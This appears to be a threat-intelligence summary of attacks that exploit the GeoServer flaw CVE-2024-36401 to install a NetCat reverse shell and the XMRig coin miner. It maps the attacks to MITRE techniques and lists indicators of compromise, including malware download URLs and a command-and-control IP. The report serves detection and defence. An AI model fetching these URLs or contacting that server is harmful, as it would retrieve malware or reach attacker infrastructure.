Threat Research

CoinMiner Attacks Exploiting GeoServer Vulnerability

Ahnlab
CoinMiner Attacks Exploiting GeoServer Vulnerability

The unpatched GeoServer vulnerability CVE-2024-36401 continues to be exploited by threat actors to install malware such as NetCat and XMRig CoinMiner, with confirmed cases in South Korea. Attackers use PowerShell and Bash scripts to deploy these malicious tools, enabling remote control and cryptocurrency mining. #GeoServer #CVE202436401 #NetCat #XMRig

Keypoints

  • GeoServer’s remote code execution vulnerability CVE-2024-36401 allows unauthorized users to execute malicious code and install malware.
  • Threat actors frequently scan for unpatched GeoServer installations and exploit them to deploy CoinMiner and other malware.
  • In South Korea, vulnerable GeoServer instances running on Windows were exploited to install NetCat and XMRig CoinMiner via PowerShell commands.
  • NetCat is used as a reverse shell to maintain remote access and control over compromised systems.
  • XMRig, a cryptocurrency miner, is installed using both PowerShell on Windows and Bash scripts on Linux, with persistence maintained through Cron jobs on Linux.
  • The malware uses system resources for mining Monero and can facilitate further malicious activities such as data theft or additional malware installation.
  • Indicators of compromise include specific file hashes, URLs, and IP addresses related to the coin miner deployment infrastructure.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used PowerShell and Bash scripts for malicious code execution and malware installation (“PowerShell command responsible for downloading a downloader”, “Bash script to install XMRig”).
  • [T1566] Phishing – Earth Baxia threat actor used spear-phishing in related campaigns exploiting CVE-2024-36401 (“attack campaign by Earth Baxia threat actor, which involved exploiting the CVE-2024-36401 vulnerability for spear-phishing”).
  • [T1071] Application Layer Protocol – NetCat used to establish reverse shell connections with C&C server for command execution (“NetCat executed via the ‘-e’ argument connects to the C&C server and operates as a reverse shell”).
  • [T1543] Create or Modify System Process – Bash script registers commands to Cron jobs to maintain persistence on Linux systems (“The Bash script also registers commands to Cron jobs for maintaining persistence”).

Indicators of Compromise

  • [MD5 Hash] Malware samples – 0b3744373c32dc6de80dfc081200d9f8, 310c17c19e90381114d47914bcb3ccf2, and 3 more hashes
  • [URL] CoinMiner and script distribution – http://182.218.82.14/js/1/gw.txt, http://182.218.82.14/js/1/startup.sh, and 3 more URLs
  • [IP Address] Command and Control server – 107.180.100.247

Read more: https://asec.ahnlab.com/en/88917/